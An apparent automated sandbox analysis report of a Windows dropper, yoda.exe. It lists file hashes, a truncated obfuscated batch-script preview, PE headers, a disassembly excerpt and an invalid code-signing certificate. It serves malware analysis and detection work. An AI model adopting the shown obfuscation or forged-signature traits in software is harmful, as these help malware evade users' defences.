                                                                                                                                                                                                                                                              SSDEEP:1536:XxVatTQ6Xytoe88Bu9+ERGvcUU7Jf3hGeHKK8c/S9B/AoHb/+KjD:Xjmxzh3RlRfOcK9B/AoH7+cD
                                                                                                                                                                                                                                                              MD5:0E220B159F97DBBF474BD4ABCBE60B28
                                                                                                                                                                                                                                                              SHA1:86658FB30A15CE54B0DE5FD33B49ABC71C8F036E
                                                                                                                                                                                                                                                              SHA-256:A3CC005EBF0DE6B5FE41FC5504C4B8EEAA7D4A946B57594D56F11DE605914C90
                                                                                                                                                                                                                                                              SHA-512:C9673623ED75B81B6F2C7C72EEC11283F45D935812B6635E351E7D9BEB4A1CED0F23DE9813C65A0E0D7B31B0DD9B6BD94D2ED55D3ED3B0C04704F6F40BB7D1C0
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):108544
                                                                                                                                                                                                                                                              Entropy (8bit):6.712735553229447
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:j6LdTmHwANUQlHS3cctlxWboHdMJ3RraSXL21rKoUn9r5C03Eq30BcrTrhCX4aVb:cdTmRxlHS3NxrHSBRtNPnj0nEoXnmm
                                                                                                                                                                                                                                                              MD5:0982457BBE3A894593EA6D9412C384D5
                                                                                                                                                                                                                                                              SHA1:145FCB779C2F2345D0A7EC899F1017AB4CA8985D
                                                                                                                                                                                                                                                              SHA-256:67D0216BC5041C505B069EE603F5F23C2D3B421BBB295E98B57613F5FDB3C4B1
                                                                                                                                                                                                                                                              SHA-512:CA31FBB3B355C56E395B3FBF51E08201D28DA5D6A8928A879B3D73CCC23C9086260DC6DAE99E476CCF0CAD6586780E80510680AF44F10D56D3ACF1EFBB51D7E2
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):27325
                                                                                                                                                                                                                                                              Entropy (8bit):7.99262325896768
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:768:fyAe9CX0UkYoDhmfjGd7cwbfnTWC8AIukUNM:KAe9Q0SokfwYwTnTWCVIukUe
                                                                                                                                                                                                                                                              MD5:7C0DC95463E8F2EAEAA833B21B1D3721
                                                                                                                                                                                                                                                              SHA1:E49710DD4BD2E8DD5EDC0B9CE0672C1616A9D5C7
                                                                                                                                                                                                                                                              SHA-256:9AC2205F7A8310DEB7EB1FBE56F010825EE35DAA0ABD5ECDC4EF242DDA72E429
                                                                                                                                                                                                                                                              SHA-512:580A9B3E76E74651A0F2E93F0779406B192BA723ED09726E0F7A39CFD66EE81BC3A6AB8ECE459460925138B5D13B67D70ECFCD247F87537BDB39361B05C3837A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):90112
                                                                                                                                                                                                                                                              Entropy (8bit):7.997801753641097
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:LGiz9LPYD891pCnUV04q6xSSZ5+ocQaAgXf996eEuaEw5NBq+dphbm3tx:KgUDM1p0v+BFaZPEIw5NBq0hbktx
                                                                                                                                                                                                                                                              MD5:6EFFC592B4E7AB9B6CB8A1D400A2A261
                                                                                                                                                                                                                                                              SHA1:8E8788E1C5E7A0AB9ED3EF4C3E84DB5B14AA6024
                                                                                                                                                                                                                                                              SHA-256:FA6A7139A0837090A962F516499C93870D152E9F5F3EF134049D02A76F8CC4C2
                                                                                                                                                                                                                                                              SHA-512:10F9AA06D39A3FEF496D96809855C8EDE7675E54E078C9DF9F116D8457820514AA5B6DC72FFEDB686FF43FBC5658C5D740793C119498DD1C77157DA788F2FB48
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:COM executable for DOS
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):77824
                                                                                                                                                                                                                                                              Entropy (8bit):7.99777398547034
                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                              SSDEEP:1536:3vX7epI7tC9102DsaOw02JjQBZwxXENwtBWjkgHroqPAlG3:KIk9qP5w02J9xFBWjk+V
                                                                                                                                                                                                                                                              MD5:B17DF7BF2951CED3197BB87D753ED74E
                                                                                                                                                                                                                                                              SHA1:338341F3B58676E50E017EABD5B4AA27F9870C8F
                                                                                                                                                                                                                                                              SHA-256:703795E797AEDA04649711437B89B36B3D7FA1792D169049DD68739B6BDB7684
                                                                                                                                                                                                                                                              SHA-512:8508D6F20369D7C4D150F8F956C2CB1C00EB1B9CA9E835215077F27B5C25C56EFC61100C22AC74715E7B2D9960D7322D19458022994872CE02BCE21D5741269A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):96256
                                                                                                                                                                                                                                                              Entropy (8bit):6.667490743822929
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:0/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyI7P4CxiG:0gF4qv+32eOyKODOSpQSAU4CV
                                                                                                                                                                                                                                                              MD5:EF015F58D70380AC3218866597698966
                                                                                                                                                                                                                                                              SHA1:BE6A0F9FAFE7594A012997658D2C1B9F6E30BF1F
                                                                                                                                                                                                                                                              SHA-256:07910EE6CD2FF3054B8D20EB1DDA29B5B59D006531F1957EF79D6EE1921AB2FE
                                                                                                                                                                                                                                                              SHA-512:B7936367B0DEDD7A79176288338EB3B1B688238C835702F3F1FBF279D86BB3CD590771928C91D63C0D6974576F6493E2D0884723747344331EDA4E8F05D2D09A
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                              Entropy (8bit):6.577510885905355
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:/q0vQEcmFdni8yDGVFE5gOHu1CwCMIBZwneAJu7QnswIPumV3BxZxu6/sPYcSyRb:y0Imbi80PtCZEMnVIPPBxT/sZt
                                                                                                                                                                                                                                                              MD5:311773682D6D85B6F521EF3B119CF11F
                                                                                                                                                                                                                                                              SHA1:0E2A985B418CA2157774AA6F36B104E725D60B8E
                                                                                                                                                                                                                                                              SHA-256:C17A9505719E72543455A87ECE76DDD61553808DA69D9F854001DA7DFA0AD8FC
                                                                                                                                                                                                                                                              SHA-512:3A84E28394D2CF1743CE0DCE4C3C4C6FA852E71FC2B1BA206FC5D5ACB56268412B2770418E0192234E6B91DE1452054C1E19EBA8AF105251611D268BA16BCFD3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):117760
                                                                                                                                                                                                                                                              Entropy (8bit):6.605148628617209
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:RwS2u5hVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLtZ:Rb2j6AUkB0CThp6vmVnjpZ
                                                                                                                                                                                                                                                              MD5:A5D29F8CE1DA22315816936CCD7236F1
                                                                                                                                                                                                                                                              SHA1:1E628E44C9FE3C81E2D0D141E3EF9A2C2B8B7149
                                                                                                                                                                                                                                                              SHA-256:47AF929A8183BFB2F9C4D1156C692EB2106C6A795AF9EF70D06259FCD08FA015
                                                                                                                                                                                                                                                              SHA-512:64CF178C52F206F8345BCDDA8CD6C62D24D74BE02ABF4F279F24A13437587C19F09DC7DE9DA41CB1EBD846DAE7B2D6DE60D2C4D19CEFCBC33F4A3D4F9FFE8820
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):91136
                                                                                                                                                                                                                                                              Entropy (8bit):6.575730405138497
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:x5fhjLueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN33:HfhnueoMmOqDoioO5bLezW9FfTut/Dd3
                                                                                                                                                                                                                                                              MD5:0A48C24C59A56ED57E42FD60F1071434
                                                                                                                                                                                                                                                              SHA1:838539401CA63F8C4AE67941BDF5C45A2995C124
                                                                                                                                                                                                                                                              SHA-256:E9B513FFAEF42CD47785C86512804ECC4287D657A55853540D0019FAE45A654F
                                                                                                                                                                                                                                                              SHA-512:83A7131DA5BDA289B7DB7F185C87DC735DE2488E0D38531CD7DD7FE14AB4E2D7EF61FCD0B76196C940DFBA3777E5938DB489518444FD6666B9DBB84EF5ED8293
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (724), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):13103
                                                                                                                                                                                                                                                              Entropy (8bit):5.1296347890270395
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:jYfuIJ6jWYKde+X7dV/xQqXroQxlwlkLEDjox8Y:jYW86jWpde+XLKqXrFxl7LEDKb
                                                                                                                                                                                                                                                              MD5:B6F33D8858EEE8EB545EDF8A06D3CBA4
                                                                                                                                                                                                                                                              SHA1:93D4D6E6BDFC6B2086FB108C218994086C899160
                                                                                                                                                                                                                                                              SHA-256:84CF0BC1A0DA15140B9FFB08DE4AB73E0811680012402F095E1431B651FDA82A
                                                                                                                                                                                                                                                              SHA-512:DFB7AFFE0EC547945FB5FB3250BC521D421AD5C189038B90C0A2C85E3D9F29530340CA80604B5F2195C94E62C62687EA07061C47591B9BD5B0D17DE770F2606F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Set Specifics=I..iEGrown-Interested-Qualification-Latinas-Slave-Bibliographic-Beds-Volunteers-Constructed-..BdIiStates-Stamp-Grad-Listing-Crawford-Affected-Shirts-Section-..HyImplies-Becoming-Voluntary-Retro-Walter-Sucks-..stkMarvel-Polar-Rapid-Loaded-Trades-Image-Governmental-Timeline-..fRStuck-Processors-Out-Gateway-..EICSKyle-Partner-Systems-Deeply-Viruses-Messaging-Industries-..QMAccountability-Stanford-Standards-Knock-Lab-These-..OMwNotified-Photoshop-Bonds-..smRelevant-Holly-Precious-Wool-Slave-Command-..Set Returning=i..kzThreats-Surgeons-Routine-Province-Rest-Illustrated-..VjoDamages-Piece-Federation-Times-Visit-Cold-..tUBBWx-Thinking-Optimization-Jackets-..xyTourist-Rings-Worcester-Mug-Fellowship-Fact-Jacksonville-..HUkInterface-Qc-Term-Louisville-About-..tnCancel-Ky-..zBShoppingcom-Camp-Walking-Eyed-Lexmark-Capacity-Islamic-Rankings-..JNDProfessionals-Exclusion-Initially-Abstract-Estonia-Automobiles-..Set First=h..wvUJRemark-Y-Unlikely-Dance-Broadband-Motel-Perth-Parliamentar
                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (724), with CRLF line terminators
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):13103
                                                                                                                                                                                                                                                              Entropy (8bit):5.1296347890270395
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:384:jYfuIJ6jWYKde+X7dV/xQqXroQxlwlkLEDjox8Y:jYW86jWpde+XLKqXrFxl7LEDKb
                                                                                                                                                                                                                                                              MD5:B6F33D8858EEE8EB545EDF8A06D3CBA4
                                                                                                                                                                                                                                                              SHA1:93D4D6E6BDFC6B2086FB108C218994086C899160
                                                                                                                                                                                                                                                              SHA-256:84CF0BC1A0DA15140B9FFB08DE4AB73E0811680012402F095E1431B651FDA82A
                                                                                                                                                                                                                                                              SHA-512:DFB7AFFE0EC547945FB5FB3250BC521D421AD5C189038B90C0A2C85E3D9F29530340CA80604B5F2195C94E62C62687EA07061C47591B9BD5B0D17DE770F2606F
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Preview:Set Specifics=I..iEGrown-Interested-Qualification-Latinas-Slave-Bibliographic-Beds-Volunteers-Constructed-..BdIiStates-Stamp-Grad-Listing-Crawford-Affected-Shirts-Section-..HyImplies-Becoming-Voluntary-Retro-Walter-Sucks-..stkMarvel-Polar-Rapid-Loaded-Trades-Image-Governmental-Timeline-..fRStuck-Processors-Out-Gateway-..EICSKyle-Partner-Systems-Deeply-Viruses-Messaging-Industries-..QMAccountability-Stanford-Standards-Knock-Lab-These-..OMwNotified-Photoshop-Bonds-..smRelevant-Holly-Precious-Wool-Slave-Command-..Set Returning=i..kzThreats-Surgeons-Routine-Province-Rest-Illustrated-..VjoDamages-Piece-Federation-Times-Visit-Cold-..tUBBWx-Thinking-Optimization-Jackets-..xyTourist-Rings-Worcester-Mug-Fellowship-Fact-Jacksonville-..HUkInterface-Qc-Term-Louisville-About-..tnCancel-Ky-..zBShoppingcom-Camp-Walking-Eyed-Lexmark-Capacity-Islamic-Rankings-..JNDProfessionals-Exclusion-Initially-Abstract-Estonia-Automobiles-..Set First=h..wvUJRemark-Y-Unlikely-Dance-Broadband-Motel-Perth-Parliamentar
                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\yoda.exe
                                                                                                                                                                                                                                                              File Type:apollo a88k COFF executable not stripped - version 3331
                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                              Size (bytes):73340
                                                                                                                                                                                                                                                              Entropy (8bit):7.1076887681952545
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:1536:gWyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:gWy4ZNoGmROL7F1G7ho2kOb
                                                                                                                                                                                                                                                              MD5:81D8E62A5A05761FAF80605B4259904D
                                                                                                                                                                                                                                                              SHA1:9FDAB7D6AF0D7C6074A0E5CDBF209C7EACC220C5
                                                                                                                                                                                                                                                              SHA-256:0813BA189ADB7CB556DD997A0A1448C4885CF692423BDAE823565AB68A33DAB8
                                                                                                                                                                                                                                                              SHA-512:79FBD2F4A2F7A9185DE26AD366B4EFBD3DD9E3CC793367C6A059A911ED13D0712B70CE521AFEE0BE3FF553E6DB6A7EB40F47BA7C05D1D0DC7D27308CCC6043C3
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (6320)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):6325
                                                                                                                                                                                                                                                              Entropy (8bit):5.8176968968714515
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:192:Qy7rxS0Wo0IfV2ZD5PKFd666667FOTRNHVAaIVNMn4:Qy7rxS0B0uVID5o666665OTRxIH
                                                                                                                                                                                                                                                              MD5:CC166F2F211760EB511C96B9344B8F65
                                                                                                                                                                                                                                                              SHA1:570E98D9C1B54CF30B776CDF3F86C796E23D20C3
                                                                                                                                                                                                                                                              SHA-256:F9A8E22F12418A929CE56FF37079E8BE8B01B3B6C9437E7A72436EF040617350
                                                                                                                                                                                                                                                              SHA-512:C7FD970B81505A6701C964CED1959D6E6E944DD953F34D63F2DDABEC7013F1FCEA37EF970E91CD9D5DA3C5AF863EB7AFAC22702F17E1A2A5F3F8523B47FBCD23
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                              Entropy (8bit):3.9353986674667634
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3:VQAOx/1n:VQAOd1n
                                                                                                                                                                                                                                                              MD5:6FED308183D5DFC421602548615204AF
                                                                                                                                                                                                                                                              SHA1:0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
                                                                                                                                                                                                                                                              SHA-256:4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
                                                                                                                                                                                                                                                              SHA-512:A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_promos
                                                                                                                                                                                                                                                              Preview:)]}'.{"update":{"promos":{}}}
                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65531)
                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                              Size (bytes):132747
                                                                                                                                                                                                                                                              Entropy (8bit):5.436906001186767
                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                              SSDEEP:3072:fPkJQ7O4N5dTm+syHEt4W3XdQ4Q6xuSr/nUW2i6o:fKQ7HTt/sHdQ4Q6xDfUW8o
                                                                                                                                                                                                                                                              MD5:9F930A9F7B21C2E6343B1157118F1B6A
                                                                                                                                                                                                                                                              SHA1:6A9852A52A3DD3F27ECB7134F10E9D1E1996D54D
                                                                                                                                                                                                                                                              SHA-256:9421C4FF6C3E3F6085268BC855E91E9E06556FAE0E9E7F70D87160E8203592D7
                                                                                                                                                                                                                                                              SHA-512:F7F7782EB26E81BAB196852F7503B13921F490783478F9C1257918C2BDB9FC49AF343FE5E3F3279AC5E3025E59B1CD4C4B204818AE23A7E128AFE7E63430FF70
                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                              URL:https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
                                                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                              Entropy (8bit):7.972615296085439
                                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                              File name:yoda.exe
                                                                                                                                                                                                                                                              File size:853'528 bytes
                                                                                                                                                                                                                                                              MD5:79884836c406ae143bc31aeadfa81e70
                                                                                                                                                                                                                                                              SHA1:3a38f9b4cf9fc75a0b6ec34230e431e0c4b7c1a2
                                                                                                                                                                                                                                                              SHA256:47d48f2753f7eab065480d9b125c1429a7943ed1fbb408e3076d7a3e3102bd0c
                                                                                                                                                                                                                                                              SHA512:1a566b38e8668fc932ada37462d099b7494fdbedb38b113a2644b67652d85ba3ba784892f5989017e2889562a1e535db9bfd43e63f27db6d4871bd014eb0b66a
                                                                                                                                                                                                                                                              SSDEEP:12288:y0gQY86Y8R5WhfO/3DeOWyE5CStQNN+GUOWVL5mwE/oN615/62K2:9lY86Y0Whm/Sby/iLGprwUO2K2
                                                                                                                                                                                                                                                              TLSH:8505238FDE78A033F4924FB0A6B2E7E75DB3F6147E58A21E95104DCD3D813605A28B16
                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                                                                                                                                                                                                                                              Icon Hash:5a12daaaaabac0e1
                                                                                                                                                                                                                                                              Entrypoint:0x4038af
                                                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                                                              Digitally signed:true
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                              Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                                                              Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                                                                                                                                                                              Signature Valid:false
                                                                                                                                                                                                                                                              Signature Issuer:CN=VeriSign Class 3 Code Signing 2009-2 CA, OU=Terms of use at https://www.verisign.com/rpa (c)09, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                                                                                                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                              Error Number:-2146869232
Not Before:01/07/2010 20:00:00
Not After:02/07/2011 19:59:59
                                                                                                                                                                                                                                                              Subject Chain
                                                                                                                                                                                                                                                              • CN=USBlyzer, OU=Digital ID Class 3 - Microsoft Software Validation v2, O=USBlyzer, L=St. Petersburg, S=St. Petersburg, C=RU
                                                                                                                                                                                                                                                              Version:3
                                                                                                                                                                                                                                                              Thumbprint MD5:75297C190C025C7A82B15677D333560E
                                                                                                                                                                                                                                                              Thumbprint SHA-1:86E18A81B94E1011C5D3E1E60789AAACCF36704A
                                                                                                                                                                                                                                                              Thumbprint SHA-256:1E9B8DE53D2F7273D2C9CBBF7AA2382E1A6C2141774B5C41FFE26E60A0F07CC9
                                                                                                                                                                                                                                                              Serial:62FCC26A7F4A434259B8883B05A42C28
                                                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                                                                                                              push ebx
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              xor ebp, ebp
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov dword ptr [esp+18h], ebp
                                                                                                                                                                                                                                                              mov dword ptr [esp+10h], 0040A268h
                                                                                                                                                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                                                                                                                                                              call dword ptr [00409030h]
                                                                                                                                                                                                                                                              push 00008001h
                                                                                                                                                                                                                                                              call dword ptr [004090B4h]
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [004092C0h]
                                                                                                                                                                                                                                                              push 00000008h
                                                                                                                                                                                                                                                              mov dword ptr [0047EB98h], eax
                                                                                                                                                                                                                                                              call 00007F5F88BBF3FBh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 000002B4h
                                                                                                                                                                                                                                                              mov dword ptr [0047EAB0h], eax
                                                                                                                                                                                                                                                              lea eax, dword ptr [esp+38h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              push 0040A264h
                                                                                                                                                                                                                                                              call dword ptr [00409184h]
                                                                                                                                                                                                                                                              push 0040A24Ch
                                                                                                                                                                                                                                                              push 00476AA0h
                                                                                                                                                                                                                                                              call 00007F5F88BBF0DDh
                                                                                                                                                                                                                                                              call dword ptr [004090B0h]
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              mov edi, 004CF0A0h
                                                                                                                                                                                                                                                              push edi
                                                                                                                                                                                                                                                              call 00007F5F88BBF0CBh
                                                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                                                              call dword ptr [00409134h]
                                                                                                                                                                                                                                                              cmp word ptr [004CF0A0h], 0022h
                                                                                                                                                                                                                                                              mov dword ptr [0047EAB8h], eax
                                                                                                                                                                                                                                                              mov eax, edi
                                                                                                                                                                                                                                                              jne 00007F5F88BBC9CAh
                                                                                                                                                                                                                                                              push 00000022h
                                                                                                                                                                                                                                                              pop esi
                                                                                                                                                                                                                                                              mov eax, 004CF0A2h
                                                                                                                                                                                                                                                              push esi
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call 00007F5F88BBEDA1h
                                                                                                                                                                                                                                                              push eax
                                                                                                                                                                                                                                                              call dword ptr [00409260h]
                                                                                                                                                                                                                                                              mov esi, eax
                                                                                                                                                                                                                                                              mov dword ptr [esp+1Ch], esi
                                                                                                                                                                                                                                                              jmp 00007F5F88BBCA53h
                                                                                                                                                                                                                                                              push 00000020h
                                                                                                                                                                                                                                                              pop ebx
                                                                                                                                                                                                                                                              cmp ax, bx
                                                                                                                                                                                                                                                              jne 00007F5F88BBC9CAh
                                                                                                                                                                                                                                                              add esi, 02h
                                                                                                                                                                                                                                                              cmp word ptr [esi], bx
                                                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                                                              • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                              • [ C ] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [RES] VS2010 SP1 build 40219
                                                                                                                                                                                                                                                              • [LNK] VS2010 SP1 build 40219

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0x3b86 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0xcebd0 | 0x1a48 | .ndata |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
